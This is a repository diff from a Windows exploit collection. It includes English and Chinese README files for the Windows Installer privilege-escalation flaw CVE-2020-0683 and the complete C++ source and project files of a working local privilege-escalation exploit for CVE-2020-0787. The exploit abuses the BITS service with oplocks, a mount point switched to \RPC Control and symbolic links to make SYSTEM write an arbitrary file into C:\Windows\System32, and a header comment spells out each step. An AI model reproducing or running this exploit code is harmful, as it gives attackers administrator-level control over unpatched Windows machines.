| Windows 10 | X86/x64/ARM64 | 1909 | | &#10004; |
| Windows Server 2008 | X86/x64 | | SP2 | |
| Windows Server 2008 | x64 | R2 | SP1 | |
| Windows Server 2012 | | | | |
| Windows Server 2012 | | R2 | | |
| Windows Server 2016 | | | | |
| Windows Server 2019 | | | | |
| Windows Server | | 1803 | | |
| Windows Server | | 1903 | | |
| Windows Server | | 1909 | | |
#### 修复补丁
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0683
```
#### 利用方式
编译方式
- VS2019V141X64 Debug
- VS2019V141X64 Release
测试机器Windows 10 1909 X64源码中只对指定文件进行写入信息如果需要获取某项程序的权限需要自行修改源码
![](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-0683_win10_1909_x64.gif)
#### 分析文章
- [MSI_EoP_New.pdf](./MSI_EoP_New.pdf)
#### 脚本来源
- [padovah4ck](https://github.com/padovah4ck/CVE-2020-0683)

54
00-CVE_EXP/CVE-2020-0683/README_EN.md Normal file
View File

@ -0,0 +1,54 @@
## CVE-2020-0683
#### Describe
An elevation of privilege vulnerability exists in the Windows Installer when MSI packages process symbolic links, aka 'Windows Installer Elevation of Privilege Vulnerability'.
#### ImpactVersion
| Product | Version | Update | Edition | Tested |
| :------------------ | :------------ | ------ | ------- | ------------------ |
| Windows 7 | X86/x64 | | SP1 | |
| Windows 8.1 | X86/x64 | | | |
| Windows 10 | X86/x64 | | | |
| Windows 10 | X86/x64 | 1607 | | |
| Windows 10 | X86/x64/ARM64 | 1709 | | |
| Windows 10 | X86/x64/ARM64 | 1803 | | |
| Windows 10 | X86/x64/ARM64 | 1809 | | |
| Windows 10 | X86/x64/ARM64 | 1903 | | |
| Windows 10 | X86/x64/ARM64 | 1909 | | &#10004; |
| Windows Server 2008 | X86/x64 | | SP2 | |
| Windows Server 2008 | x64 | R2 | SP1 | |
| Windows Server 2012 | | | | |
| Windows Server 2012 | | R2 | | |
| Windows Server 2016 | | | | |
| Windows Server 2019 | | | | |
| Windows Server | | 1803 | | |
| Windows Server | | 1903 | | |
| Windows Server | | 1909 | | |
#### Patch
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0683
```
#### Utilization
CompilerEnvironment
- VS2019V141X64 Debug
- VS2019V141X64 Release
Test Machine Windows 10 1909 x64, only written information on the specified file in the source code, if you need to get the permissions of a program, you need to modify the source code yourself.
![](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-0683_win10_1909_x64.gif)
#### Analyze
- [MSI_EoP_New.pdf](./MSI_EoP_New.pdf)
#### ProjectSource
- [padovah4ck](https://github.com/padovah4ck/CVE-2020-0683)

BIN
00-CVE_EXP/CVE-2020-0683/foo.msi Normal file
View File

Binary file not shown.

49
00-CVE_EXP/CVE-2020-0787/BitsArbitraryFileMove.sln Normal file
View File

@ -0,0 +1,49 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 2013
VisualStudioVersion = 12.0.40629.0
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "BitsArbitraryFileMove", "BitsArbitraryFileMove\BitsArbitraryFileMove.vcxproj", "{36C758EB-8C26-4DD6-915E-7030275418A5}"
EndProject
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CommonUtils", "CommonUtils\CommonUtils.vcxproj", "{2AA6AB5E-18A8-49F4-B25D-587E8C3E4432}"
EndProject
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "BitsArbitraryFileMoveExploit", "BitsArbitraryFileMoveExploit\BitsArbitraryFileMoveExploit.vcxproj", "{279C1CA8-E748-4BEC-BB7D-8AE7AEA2E60E}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|x64 = Debug|x64
Debug|x86 = Debug|x86
Release|x64 = Release|x64
Release|x86 = Release|x86
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{36C758EB-8C26-4DD6-915E-7030275418A5}.Debug|x64.ActiveCfg = Debug|x64
{36C758EB-8C26-4DD6-915E-7030275418A5}.Debug|x64.Build.0 = Debug|x64
{36C758EB-8C26-4DD6-915E-7030275418A5}.Debug|x86.ActiveCfg = Debug|Win32
{36C758EB-8C26-4DD6-915E-7030275418A5}.Debug|x86.Build.0 = Debug|Win32
{36C758EB-8C26-4DD6-915E-7030275418A5}.Release|x64.ActiveCfg = Release|x64
{36C758EB-8C26-4DD6-915E-7030275418A5}.Release|x64.Build.0 = Release|x64
{36C758EB-8C26-4DD6-915E-7030275418A5}.Release|x86.ActiveCfg = Release|Win32
{36C758EB-8C26-4DD6-915E-7030275418A5}.Release|x86.Build.0 = Release|Win32
{2AA6AB5E-18A8-49F4-B25D-587E8C3E4432}.Debug|x64.ActiveCfg = Debug|x64
{2AA6AB5E-18A8-49F4-B25D-587E8C3E4432}.Debug|x86.ActiveCfg = Debug|Win32
{2AA6AB5E-18A8-49F4-B25D-587E8C3E4432}.Debug|x86.Build.0 = Debug|Win32
{2AA6AB5E-18A8-49F4-B25D-587E8C3E4432}.Release|x64.ActiveCfg = Release|Win32
{2AA6AB5E-18A8-49F4-B25D-587E8C3E4432}.Release|x86.ActiveCfg = Release|Win32
{2AA6AB5E-18A8-49F4-B25D-587E8C3E4432}.Release|x86.Build.0 = Release|Win32
{279C1CA8-E748-4BEC-BB7D-8AE7AEA2E60E}.Debug|x64.ActiveCfg = Debug|x64
{279C1CA8-E748-4BEC-BB7D-8AE7AEA2E60E}.Debug|x64.Build.0 = Debug|x64
{279C1CA8-E748-4BEC-BB7D-8AE7AEA2E60E}.Debug|x86.ActiveCfg = Debug|Win32
{279C1CA8-E748-4BEC-BB7D-8AE7AEA2E60E}.Debug|x86.Build.0 = Debug|Win32
{279C1CA8-E748-4BEC-BB7D-8AE7AEA2E60E}.Release|x64.ActiveCfg = Release|x64
{279C1CA8-E748-4BEC-BB7D-8AE7AEA2E60E}.Release|x64.Build.0 = Release|x64
{279C1CA8-E748-4BEC-BB7D-8AE7AEA2E60E}.Release|x86.ActiveCfg = Release|Win32
{279C1CA8-E748-4BEC-BB7D-8AE7AEA2E60E}.Release|x86.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {1114A180-4DB1-4FC6-8058-4018A3056CAA}
EndGlobalSection
EndGlobal

BIN
00-CVE_EXP/CVE-2020-0787/BitsArbitraryFileMove.v12.suo Normal file
View File

Binary file not shown.

572
00-CVE_EXP/CVE-2020-0787/BitsArbitraryFileMove/BitsArbitraryFileMove.cpp Normal file
View File

@ -0,0 +1,572 @@
// Windows
#include <iostream>
// BitsArbitraryFileMove
#include "BitsArbitraryFileMove.h"
#include "CBitsCom.h"
// Symbolic link testing tools
#include "../CommonUtils/CommonUtils.h"
#include "../CommonUtils/ReparsePoint.h"
#include "../CommonUtils/FileOpLock.h"
#include "../CommonUtils/FileSymlink.h"
BitsArbitraryFileMove::BitsArbitraryFileMove()
{
m_bCustomSourceFile = FALSE;
ZeroMemory(m_wszWorkspaceDirPath, MAX_PATH * sizeof(WCHAR));
ZeroMemory(m_wszMountpointDirPath, MAX_PATH * sizeof(WCHAR));
ZeroMemory(m_wszBaitDirPath, MAX_PATH * sizeof(WCHAR));
ZeroMemory(m_wszSourceFilePath, MAX_PATH * sizeof(WCHAR));
ZeroMemory(m_wszTargetFilePath, MAX_PATH * sizeof(WCHAR));
ZeroMemory(m_wszBitsLocalFileName, MAX_FILENAME * sizeof(WCHAR));
ZeroMemory(m_wszBitsTempFileName, MAX_FILENAME * sizeof(WCHAR));
ZeroMemory(m_wszBitsTempFilePath, MAX_PATH * sizeof(WCHAR));
}
BitsArbitraryFileMove::~BitsArbitraryFileMove()
{
CleanUp();
}
BOOL BitsArbitraryFileMove::Run(LPCWSTR pwszSrcFile, LPCWSTR pwszDstFile)
{
WCHAR wszMsg[MAX_MSG];
// ========================================================================
// Check whether target file already exists
// ========================================================================
StringCchCat(m_wszTargetFilePath, MAX_PATH, pwszDstFile);
/*if (TargetFileExists())
{
wprintf_s(L"[-] Target file '%ls' already exists. Aborting.\n", m_wszTargetFilePath);
return FALSE;
}*/
// ========================================================================
// Prepare environment
// ========================================================================
if (!PrepareWorkspace())
{
wprintf_s(L"[-] BitsArbitraryFileMove::PrepareWorkspace() failed.\n");
return FALSE;
}
wprintf_s(L"[*] Workspace: '%ls'.\n", m_wszWorkspaceDirPath);
// ========================================================================
// Handle source file
// If a source file path is provided, set it as the source file path for
// the exploit. Otherwise, write embedded DLL in the workspace.
// ========================================================================
if (pwszSrcFile == NULL)
{
swprintf_s(m_wszSourceFilePath, MAX_PATH, L"%ls%ls", m_wszWorkspaceDirPath, L"FakeDll.dll");
if (WriteSourceFile())
{
if (DEBUG) { wprintf_s(L"[DEBUG] Created 64-bit DLL '%ls'.\n", m_wszSourceFilePath); }
}
else
{
wprintf_s(L"[-] BitsArbitraryFileMove::WriteEmbeddedDll() failed.\n");
return FALSE;
}
}
else
{
m_bCustomSourceFile = TRUE;
StringCchCat(m_wszSourceFilePath, MAX_PATH, pwszSrcFile);
}
wprintf_s(L"[*] Source file: '%ls'.\n", m_wszSourceFilePath);
wprintf_s(L"[*] Destination file: '%ls'.\n", m_wszTargetFilePath);
// ========================================================================
// Create a mountpoint from MountPointDir to BaitDir
// ========================================================================
if (!ReparsePoint::CreateMountPoint(m_wszMountpointDirPath, m_wszBaitDirPath, L""))
{
wprintf_s(L"[-] ReparsePoint::CreateMountPoint('%ls') failed (Err: %d).\n", m_wszMountpointDirPath, ReparsePoint::GetLastError());
return FALSE;
}
wprintf_s(L"[*] Created Mount Point: '%ls' -> '%ls'.\n", m_wszMountpointDirPath, m_wszBaitDirPath);
// ========================================================================
// BITS - Create Group, create a Job and add file
// ========================================================================
CBitsCom cBitsCom;
WCHAR wszJobLocalFilename[MAX_PATH];
StringCchCat(m_wszBitsLocalFileName, MAX_FILENAME, L"test.txt");
ZeroMemory(wszJobLocalFilename, MAX_PATH * sizeof(WCHAR));
swprintf_s(wszJobLocalFilename, MAX_PATH, L"%ls%ls", m_wszMountpointDirPath, m_wszBitsLocalFileName);
if (DEBUG) { wprintf_s(L"[DEBUG] Using Local File '%ls'\n", wszJobLocalFilename); }
if (cBitsCom.PrepareJob(wszJobLocalFilename) != BITSCOM_ERR_SUCCESS)
{
wprintf_s(L"[-] CBitsCom::PrepareJob('%ls') failed.\n", wszJobLocalFilename);
return FALSE;
}
wprintf_s(L"[*] Created BITS job with local file: '%ls'.\n", wszJobLocalFilename);
// ========================================================================
// Find the TMP file created by BITS
// ========================================================================
Sleep(3000);
if (!FindBitsTempFile())
{
wprintf_s(L"[-] BitsArbitraryFileMove::FindBitsTempFile() failed.\n");
return FALSE;
}
ZeroMemory(wszMsg, MAX_MSG * sizeof(WCHAR));
swprintf_s(wszMsg, MAX_MSG, L"[+] Found BITS temp file: '%ls'\n", m_wszBitsTempFileName);
PrintSuccess(wszMsg);
// ========================================================================
// Reconstruct the full path of the TMP file
// ========================================================================
swprintf_s(m_wszBitsTempFilePath, MAX_PATH, L"%ls%ls", m_wszBaitDirPath, m_wszBitsTempFileName);
if (DEBUG) { wprintf_s(L"[DEBUG] BITS temp file path: '%ls'\n", m_wszBitsTempFilePath); }
// ========================================================================
// Set an oplcok on the temp file
// ========================================================================
FileOpLock* oplock = nullptr;
//oplock = FileOpLock::CreateLock(m_wszBitsTempFilePath, L"", HandleOplock);
oplock = FileOpLock::CreateLock(m_wszBitsTempFilePath, L"", nullptr);
if (oplock == nullptr)
{
wprintf_s(L"[-] FileOpLock::CreateLock('%ls') failed.\n", m_wszBitsTempFilePath);
return FALSE;
}
wprintf_s(L"[*] OpLock set on '%ls'.\n", m_wszBitsTempFilePath);
// ========================================================================
// Resume BITS job and wait for the oplock to be triggered
// ========================================================================
if (cBitsCom.ResumeJob() != BITSCOM_ERR_SUCCESS)
{
wprintf_s(L"[-] BitsCom::ResumeJob() failed.\n");
delete oplock;
return FALSE;
}
wprintf_s(L"[*] BITS job has been resumed. Waiting for the oplock to be triggered...\n");
oplock->WaitForLock(INFINITE);
PrintSuccess(L"[+] OpLock triggered. Switching mountpoint.\n");
// ========================================================================
// Create Mount Point to \RPC Control
// ========================================================================
// --- Delete previous mount point ---
if (!ReparsePoint::DeleteMountPoint(m_wszMountpointDirPath))
{
wprintf_s(L"[-] ReparsePoint::DeleteMountPoint('%ls') failed (Error: %ls).\n", m_wszMountpointDirPath, GetErrorMessage().c_str());
delete oplock;
return FALSE;
}
if (DEBUG) { wprintf_s(L"[DEBUG] Deleted mountpoint: '%ls'.\n", m_wszMountpointDirPath); }
// --- Create mountpoint to \RPC Control ---
const WCHAR* wszBaseObjDir = L"\\RPC Control";
if (!ReparsePoint::CreateMountPoint(m_wszMountpointDirPath, wszBaseObjDir, L""))
{
wprintf_s(L"[-] ReparsePoint::CreateMountPoint('%ls') failed (Err: %d).\n", m_wszMountpointDirPath, ReparsePoint::GetLastError());
delete oplock;
return FALSE;
}
if (DEBUG) { wprintf_s(L"[DEBUG] Created mountpoint: '%ls' -> '%ls'.\n", m_wszMountpointDirPath, wszBaseObjDir); }
// ========================================================================
// Create symlinks
// ========================================================================
WCHAR wszLinkName[MAX_PATH];
WCHAR wszLinkTarget[MAX_PATH];
// --- TMP file -> source DLL ---
ZeroMemory(wszLinkName, MAX_PATH * sizeof(WCHAR));
ZeroMemory(wszLinkTarget, MAX_PATH * sizeof(WCHAR));
swprintf_s(wszLinkName, MAX_PATH, L"%ls\\%ls", wszBaseObjDir, m_wszBitsTempFileName); // -> '\RPC Control\BIT84A4.tmp'
swprintf_s(wszLinkTarget, MAX_PATH, L"\\??\\%ls", m_wszSourceFilePath); // -> '\??\C:\Users\lab-user\AppData\Local\Temp\workspace\FakeDll.dll'
HANDLE hSymlinkSource = CreateSymlink(nullptr, wszLinkName, wszLinkTarget);
if (hSymlinkSource == nullptr)
{
wprintf_s(L"[-] CreateSymlink('%ls') failed.\n", wszLinkName);
delete oplock;
return FALSE;
}
wprintf_s(L"[*] Created Symlink: '%ls' -> '%ls'\n", wszLinkName, wszLinkTarget);
// --- Local file -> target DLL ---
ZeroMemory(wszLinkName, MAX_PATH * sizeof(WCHAR));
ZeroMemory(wszLinkTarget, MAX_PATH * sizeof(WCHAR));
swprintf_s(wszLinkName, MAX_PATH, L"%ls\\%ls", wszBaseObjDir, m_wszBitsLocalFileName); // -> '\RPC Control\test.txt'
swprintf_s(wszLinkTarget, MAX_PATH, L"\\??\\%ls", m_wszTargetFilePath); // -> '\??\C:\Windows\System32\FakeDll.dll'
HANDLE hSymlinkDestination = CreateSymlink(nullptr, wszLinkName, wszLinkTarget);
if (hSymlinkDestination == nullptr)
{
wprintf_s(L"[-] CreateSymlink('%ls') failed.\n", wszLinkName);
CloseHandle(hSymlinkSource);
delete oplock;
return FALSE;
}
wprintf_s(L"[*] Created Symlink: '%ls' -> '%ls'\n", wszLinkName, wszLinkTarget);
// ========================================================================
// Release oplock and complete job
// ========================================================================
wprintf_s(L"[*] Releasing OpLock and waiting for the job to complete...\n");
delete oplock;
if (cBitsCom.CompleteJob() != BITSCOM_ERR_SUCCESS)
{
wprintf_s(L"[-] BitsCom::CompleteJob() failed.\n");
CloseHandle(hSymlinkSource);
CloseHandle(hSymlinkDestination);
return FALSE;
}
if (DEBUG) { wprintf_s(L"[DEBUG] CBitsCom::CompleteJob() OK\n"); }
CloseHandle(hSymlinkSource);
CloseHandle(hSymlinkDestination);
// ========================================================================
// Check whether target DLL exists
// ========================================================================
if (!TargetFileExists())
{
wprintf_s(L"[-] Target file '%ls' doesn't exist. Exploit failed.", m_wszTargetFilePath);
return FALSE;
}
ZeroMemory(wszMsg, MAX_MSG * sizeof(WCHAR));
swprintf_s(wszMsg, MAX_MSG, L"[+] Found target file '%ls'. Exploit successfull!\n", m_wszTargetFilePath);
PrintSuccess(wszMsg);
return TRUE;
}
BOOL BitsArbitraryFileMove::PrepareWorkspace()
{
/*
0) Prepare workspace
Create C:\workspace\
Create C:\workspace\mountpoint\
Create C:\workspace\bait\
<DIR> C:\workspace
|__ <DIR> mountpoint
|__ <DIR> redir
*/
DWORD dwRet = 0;
WCHAR wszTempPathBuffer[MAX_PATH];
// ========================================================================
// Create a workspace
// ========================================================================
dwRet = GetTempPath(MAX_PATH, wszTempPathBuffer);
if (dwRet > MAX_PATH || (dwRet == 0))
{
wprintf_s(L"[-] GetTempPath() failed (Err: %d).\n", GetLastError());
ZeroMemory(wszTempPathBuffer, MAX_PATH);
StringCchCat(wszTempPathBuffer, MAX_PATH, L"C:\\workspace\\");
}
else
{
if (wszTempPathBuffer[wcslen(wszTempPathBuffer) - 1] != '\\')
{
StringCchCat(wszTempPathBuffer, MAX_PATH, L"\\");
}
StringCchCat(wszTempPathBuffer, MAX_PATH, L"workspace\\");
}
if (!CreateDirectory(wszTempPathBuffer, nullptr))
{
dwRet = GetLastError();
if (dwRet == ERROR_ALREADY_EXISTS)
{
wprintf_s(L"[!] The directory '%ls' already exists.\n", wszTempPathBuffer);
}
else
{
wprintf_s(L"[-] CreateDirectory('%ls') failed (Err: %d).\n", wszTempPathBuffer, dwRet);
return FALSE;
}
}
StringCchCat(m_wszWorkspaceDirPath, MAX_PATH, wszTempPathBuffer);
if (DEBUG) { wprintf_s(L"[DEBUG] Using Workspace Directory '%ls'.\n", m_wszWorkspaceDirPath); }
// ========================================================================
// Create a directory for the mount point
// ========================================================================
ZeroMemory(wszTempPathBuffer, MAX_PATH);
StringCchCat(wszTempPathBuffer, MAX_PATH, m_wszWorkspaceDirPath);
StringCchCat(wszTempPathBuffer, MAX_PATH, L"mountpoint\\");
if (!CreateDirectory(wszTempPathBuffer, nullptr))
{
wprintf_s(L"[-] CreateDirectory('%ls') failed (Err: %d).\n", wszTempPathBuffer, GetLastError());
return FALSE;
}
StringCchCat(m_wszMountpointDirPath, MAX_PATH, wszTempPathBuffer);
if (DEBUG) { wprintf_s(L"[DEBUG] Using Mount Point Directory '%ls'.\n", m_wszMountpointDirPath); }
// ========================================================================
// Create a "bait" directory for the TMP file
// ========================================================================
ZeroMemory(wszTempPathBuffer, MAX_PATH);
StringCchCat(wszTempPathBuffer, MAX_PATH, m_wszWorkspaceDirPath);
StringCchCat(wszTempPathBuffer, MAX_PATH, L"bait\\");
if (!CreateDirectory(wszTempPathBuffer, nullptr))
{
wprintf_s(L"[-] CreateDirectory('%ls') failed (Err: %d).\n", wszTempPathBuffer, GetLastError());
return FALSE;
}
StringCchCat(m_wszBaitDirPath, MAX_PATH, wszTempPathBuffer);
if (DEBUG) { wprintf_s(L"[DEBUG] Using Bait Directory '%ls'.\n", m_wszBaitDirPath); }
return TRUE;
}
BOOL BitsArbitraryFileMove::WriteSourceFile()
{
HANDLE hFile;
BOOL bErrorFlag = FALSE;
const char* fileContent = "foo123\r\n";
DWORD dwBytesToWrite = (DWORD)strlen(fileContent);
DWORD dwBytesWritten = 0;
hFile = CreateFile(m_wszSourceFilePath, GENERIC_WRITE, 0, NULL, CREATE_NEW, FILE_ATTRIBUTE_NORMAL, NULL);
if (hFile == INVALID_HANDLE_VALUE)
{
wprintf_s(L"[-] CreateFile('%ls') failed (Err: %d).\n", m_wszSourceFilePath, GetLastError());
return FALSE;
}
bErrorFlag = WriteFile(hFile, fileContent, dwBytesToWrite, &dwBytesWritten, NULL);
if (FALSE == bErrorFlag)
{
wprintf_s(L"[-] WriteFile('%ls') failed (Err: %d).\n", m_wszSourceFilePath, GetLastError());
return FALSE;
}
else
{
if (dwBytesWritten != dwBytesToWrite)
{
wprintf_s(L"[-] WriteFile('%ls') failed (Err: %d).\n", m_wszSourceFilePath, GetLastError());
return FALSE;
}
}
CloseHandle(hFile);
return TRUE;
}
BOOL BitsArbitraryFileMove::FindBitsTempFile()
{
WIN32_FIND_DATA structWin32FindData;
WCHAR wszSearchPath[MAX_PATH];
HANDLE hRes;
ZeroMemory(wszSearchPath, MAX_PATH * sizeof(WCHAR));
StringCchCat(wszSearchPath, MAX_PATH, m_wszBaitDirPath);
StringCchCat(wszSearchPath, MAX_PATH, L"BIT*.tmp");
hRes = FindFirstFile(wszSearchPath, &structWin32FindData);
if (hRes == INVALID_HANDLE_VALUE)
{
wprintf_s(L"[-] FindFirstFile('%ls') failed (Err: %d).\n", wszSearchPath, GetLastError());
return FALSE;
}
StringCchCat(m_wszBitsTempFileName, MAX_FILENAME, structWin32FindData.cFileName);
CloseHandle(hRes);
return TRUE;
}
BOOL BitsArbitraryFileMove::TargetFileExists()
{
HANDLE hProcess;
BOOL bWow64Process;
PVOID pOldValue = nullptr;
BOOL bRes = FALSE;
hProcess = GetCurrentProcess();
if (!IsWow64Process(hProcess, &bWow64Process))
{
wprintf_s(L"[!] IsWow64Process() failed (Err: %d).\n", GetLastError());
}
if (bWow64Process)
{
// Disable WOW64 file system redirector
if (!Wow64DisableWow64FsRedirection(&pOldValue))
{
wprintf_s(L"[!] Wow64DisableWow64FsRedirection() failed (Err: %d).\n", GetLastError());
}
}
// Check whether target file exists
if (GetFileAttributes(m_wszTargetFilePath) != INVALID_FILE_ATTRIBUTES)
{
if (DEBUG) { wprintf_s(L"[DEBUG] Found target file '%ls'.\n", m_wszTargetFilePath); }
bRes = TRUE;
}
else
{
if (DEBUG) { wprintf_s(L"[DEBUG] Target file '%ls' doesn't exist.\n", m_wszTargetFilePath); }
}
if (bWow64Process)
{
// Enable WOW64 file system redirector
if (!Wow64RevertWow64FsRedirection(pOldValue))
{
wprintf_s(L"[!] Wow64RevertWow64FsRedirection() failed (Err: %d).\n", GetLastError());
}
}
CloseHandle(hProcess);
return bRes;
}
void BitsArbitraryFileMove::CleanUp()
{
wprintf_s(L"[*] Performing clean-up...\n");
// Delete BITS temp file
if (wcslen(m_wszBitsTempFilePath) > 0)
{
if (GetFileAttributes(m_wszBitsTempFilePath) != INVALID_FILE_ATTRIBUTES)
{
if (!DeleteFile(m_wszBitsTempFilePath))
wprintf_s(L"[!] DeleteFile('%ls') failed (Err: %d).\n", m_wszBitsTempFilePath, GetLastError());
else
if (DEBUG) { wprintf_s(L"[DEBUG] Deleted file '%ls'.\n", m_wszBitsTempFilePath); }
}
}
// Delete the source file if it was created by us
if (!m_bCustomSourceFile)
{
if (GetFileAttributes(m_wszSourceFilePath) != INVALID_FILE_ATTRIBUTES)
{
if (!DeleteFile(m_wszSourceFilePath))
wprintf_s(L"[!] DeleteFile('%ls') failed (Err: %d).\n", m_wszSourceFilePath, GetLastError());
else
if (DEBUG) { wprintf_s(L"[DEBUG] Deleted file '%ls'.\n", m_wszSourceFilePath); }
}
}
// Remove bait directory
if (wcslen(m_wszBaitDirPath) > 0)
{
if (GetFileAttributes(m_wszBaitDirPath) != INVALID_FILE_ATTRIBUTES)
{
if (!RemoveDirectory(m_wszBaitDirPath))
wprintf_s(L"[!] RemoveDirectory('%ls') failed (Err: %d).\n", m_wszBaitDirPath, GetLastError());
else
if (DEBUG) { wprintf_s(L"[DEBUG] Removed directory '%ls'.\n", m_wszBaitDirPath); }
}
}
// Remove mount point directory
if (wcslen(m_wszMountpointDirPath) > 0)
{
if (GetFileAttributes(m_wszMountpointDirPath) != INVALID_FILE_ATTRIBUTES)
{
// Delete Mount Point
if (!ReparsePoint::DeleteMountPoint(m_wszMountpointDirPath))
wprintf_s(L"[!] ReparsePoint::DeleteMountPoint('%ls') failed.\n", m_wszMountpointDirPath);
else
if (DEBUG) { wprintf_s(L"[DEBUG] Deleted Mount Point '%ls'.\n", m_wszMountpointDirPath); }
// Remove directory
if (!RemoveDirectory(m_wszMountpointDirPath))
wprintf_s(L"[!] RemoveDirectory('%ls') failed (Err: %d).\n", m_wszMountpointDirPath, GetLastError());
else
if (DEBUG) { wprintf_s(L"[DEBUG] Removed directory '%ls'.\n", m_wszMountpointDirPath); }
}
}
// Remove workspace directory
if (wcslen(m_wszWorkspaceDirPath) > 0)
{
if (GetFileAttributes(m_wszWorkspaceDirPath) != INVALID_FILE_ATTRIBUTES)
{
if (!RemoveDirectory(m_wszWorkspaceDirPath))
wprintf_s(L"[!] RemoveDirectory('%ls') failed (Err: %d).\n", m_wszWorkspaceDirPath, GetLastError());
else
if (DEBUG) { wprintf_s(L"[DEBUG] Removed directory '%ls'.\n", m_wszWorkspaceDirPath); }
}
}
return;
}
void BitsArbitraryFileMove::PrintSuccess(LPCWSTR pwszMsg)
{
HANDLE hConsole;
hConsole = GetStdHandle(STD_OUTPUT_HANDLE);
SetConsoleTextAttribute(hConsole, FOREGROUND_GREEN | FOREGROUND_INTENSITY);
wprintf_s(L"%ls", pwszMsg);
SetConsoleTextAttribute(hConsole, FOREGROUND_GREEN | FOREGROUND_BLUE | FOREGROUND_RED);
}

77
00-CVE_EXP/CVE-2020-0787/BitsArbitraryFileMove/BitsArbitraryFileMove.h Normal file
View File

@ -0,0 +1,77 @@
#pragma once
/*
0) Prepare workspace
Create C:\workspace\
Create C:\workspace\mountpoint\
Create C:\workspace\bait\
Create C:\workspace\FakeDll.dll
<DIR> C:\workspace
|__ <DIR> mountpoint
|__ <DIR> redir
|__ FakeDll.dll
1) Create a mountpoint
C:\workspace\mountpoint\ -> C:\workspace\bait\
2) Create the group / job / add file / etc.
LocalFile = C:\workspace\mountpoint\test.txt
At this point, a tmp file should have been created with user impersonation
C:\workspace\bait\BITD857.tmp
3) Set an oplock on the tmp file
C:\workspace\bait\BITD857.tmp
4) Resume the job
The oplock will be triggered on the write operation as user
5) Switch the mountpoint and create symlinks
C:\workspace\mountpoint\ -> \RPC Control
\RPC Control\BITD857.tmp -> \??\C:\workspace\FakeDll.dll
\RPC Control\test.txt -> \??\C:\Windows\System32\FakeDll.dll
6) Release the oplock
The MoveFileW operation should be done as System
*/
#include <Windows.h>
#include <tchar.h>
#include <strsafe.h>
#define DEBUG FALSE
#define MAX_FILENAME 32
#define MAX_MSG 1024
class BitsArbitraryFileMove
{
private:
BOOL m_bCustomSourceFile;
WCHAR m_wszWorkspaceDirPath[MAX_PATH];
WCHAR m_wszMountpointDirPath[MAX_PATH];
WCHAR m_wszBaitDirPath[MAX_PATH];
WCHAR m_wszSourceFilePath[MAX_PATH];
WCHAR m_wszTargetFilePath[MAX_PATH];
WCHAR m_wszBitsLocalFileName[MAX_FILENAME];
WCHAR m_wszBitsTempFileName[MAX_FILENAME];
WCHAR m_wszBitsTempFilePath[MAX_PATH];
public:
// Constructor / Destructor
BitsArbitraryFileMove();
~BitsArbitraryFileMove();
public:
BOOL Run(LPCWSTR pwszDstFile); // e.g.: Destination="C:\Windows\System32\FakeDll.dll"
BOOL Run(LPCWSTR pwszSrcFile, LPCWSTR pwszDstFile); // e.g.: Source="C:\Workspace\FakeDll.dll", Destination="C:\Windows\System32\FakeDll.dll"
void PrintSuccess(LPCWSTR pwszMsg);
private:
BOOL PrepareWorkspace();
BOOL WriteSourceFile();
BOOL FindBitsTempFile();
BOOL TargetFileExists();
void CleanUp();
};

174
00-CVE_EXP/CVE-2020-0787/BitsArbitraryFileMove/BitsArbitraryFileMove.vcxproj Normal file
View File

@ -0,0 +1,174 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<VCProjectVersion>16.0</VCProjectVersion>
<ProjectGuid>{36C758EB-8C26-4DD6-915E-7030275418A5}</ProjectGuid>
<Keyword>Win32Proj</Keyword>
<RootNamespace>BitsArbitraryFileMove</RootNamespace>
<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>StaticLibrary</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>StaticLibrary</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>StaticLibrary</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v120</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
<UseOfMfc>Static</UseOfMfc>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
